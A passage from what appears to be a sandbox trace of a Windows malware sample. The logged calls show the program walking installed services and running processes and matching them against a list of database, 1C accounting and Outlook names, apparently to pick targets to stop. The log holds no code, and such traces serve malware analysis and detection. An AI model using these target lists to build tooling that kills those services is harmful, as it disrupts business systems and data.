lpServices=0x5be058, cbBufSize=0x123e, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5be058, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0039.479] CloseServiceHandle (hSCObject=0x5efe18) returned 1 [0039.479] lstrlenW (lpString="Appinfo") returned 7 [0039.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0039.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0039.479] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0039.479] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0039.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0039.479] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0039.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.479] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0039.479] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0039.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0039.479] lstrlenW (lpString="AudioSrv") returned 8 [0039.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0039.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0039.480] lstrlenW (lpString="BFE") returned 3 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0039.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0039.480] lstrlenW (lpString="CryptSvc") returned 8 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0039.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0039.480] lstrlenW (lpString="CscService") returned 10 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0039.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0039.480] lstrlenW (lpString="DcomLaunch") returned 10 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0039.480] lstrlenW (lpString="Dhcp") returned 4 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0039.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0039.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0039.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0039.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0039.480] lstrlenW (lpString="Dnscache") returned 8 [0039.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0039.481] lstrlenW (lpString="DPS") returned 3 [0039.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0039.481] lstrlenW (lpString="eventlog") returned 8 [0039.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0039.481] lstrlenW (lpString="EventSystem") returned 11 [0039.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0039.481] lstrlenW (lpString="gpsvc") returned 5 [0039.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0039.481] lstrlenW (lpString="iphlpsvc") returned 8 [0039.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.481] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0039.481] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0039.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0039.482] lstrlenW (lpString="LanmanServer") returned 12 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0039.482] lstrlenW (lpString="LanmanWorkstation") returned 17 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0039.482] lstrlenW (lpString="lmhosts") returned 7 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0039.482] lstrlenW (lpString="MMCSS") returned 5 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0039.482] lstrlenW (lpString="MpsSvc") returned 6 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0039.482] lstrlenW (lpString="Netman") returned 6 [0039.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0039.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0039.482] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0039.482] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0039.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0039.482] lstrlenW (lpString="netprofm") returned 8 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0039.483] lstrlenW (lpString="NlaSvc") returned 6 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0039.483] lstrlenW (lpString="nsi") returned 3 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0039.483] lstrlenW (lpString="PcaSvc") returned 6 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0039.483] lstrlenW (lpString="PlugPlay") returned 8 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0039.483] lstrlenW (lpString="Power") returned 5 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0039.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0039.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0039.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0039.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0039.483] lstrlenW (lpString="ProfSvc") returned 7 [0039.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0039.484] lstrlenW (lpString="RpcEptMapper") returned 12 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0039.484] lstrlenW (lpString="RpcSs") returned 5 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0039.484] lstrlenW (lpString="SamSs") returned 5 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0039.484] lstrlenW (lpString="Schedule") returned 8 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0039.484] lstrlenW (lpString="SENS") returned 4 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0039.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0039.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0039.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0039.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0039.484] lstrlenW (lpString="ShellHWDetection") returned 16 [0039.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0039.485] lstrlenW (lpString="Spooler") returned 7 [0039.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0039.485] lstrlenW (lpString="SysMain") returned 7 [0039.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0039.485] lstrlenW (lpString="Themes") returned 6 [0039.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0039.485] lstrlenW (lpString="TrkWks") returned 6 [0039.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0039.485] lstrlenW (lpString="UxSms") returned 5 [0039.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0039.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0039.485] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0039.485] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0039.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0039.485] lstrlenW (lpString="VSS") returned 3 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0039.486] lstrlenW (lpString="WdiServiceHost") returned 14 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0039.486] lstrlenW (lpString="WdiSystemHost") returned 13 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0039.486] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0039.486] lstrlenW (lpString="Winmgmt") returned 7 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0039.486] lstrlenW (lpString="WPDBusEnum") returned 10 [0039.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0039.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0039.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0039.486] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be058 | out: hHeap=0x570000) returned 1 [0039.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0039.489] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0039.489] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0039.490] lstrlenW (lpString="System") returned 6 [0039.490] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0039.490] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0039.490] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0039.491] lstrlenW (lpString="smss.exe") returned 8 [0039.491] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0039.491] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0039.491] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.492] lstrlenW (lpString="csrss.exe") returned 9 [0039.492] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.492] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.492] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.492] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.492] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.492] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.492] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0039.492] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0039.493] lstrlenW (lpString="wininit.exe") returned 11 [0039.493] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0039.493] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0039.493] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.494] lstrlenW (lpString="csrss.exe") returned 9 [0039.494] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.494] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0039.494] lstrlenW (lpString="winlogon.exe") returned 12 [0039.495] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0039.495] lstrlenW (lpString="services.exe") returned 12 [0039.495] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, 